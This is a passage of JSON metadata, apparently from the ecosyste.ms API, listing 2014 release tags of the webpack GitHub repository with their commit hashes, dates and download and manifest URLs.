releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.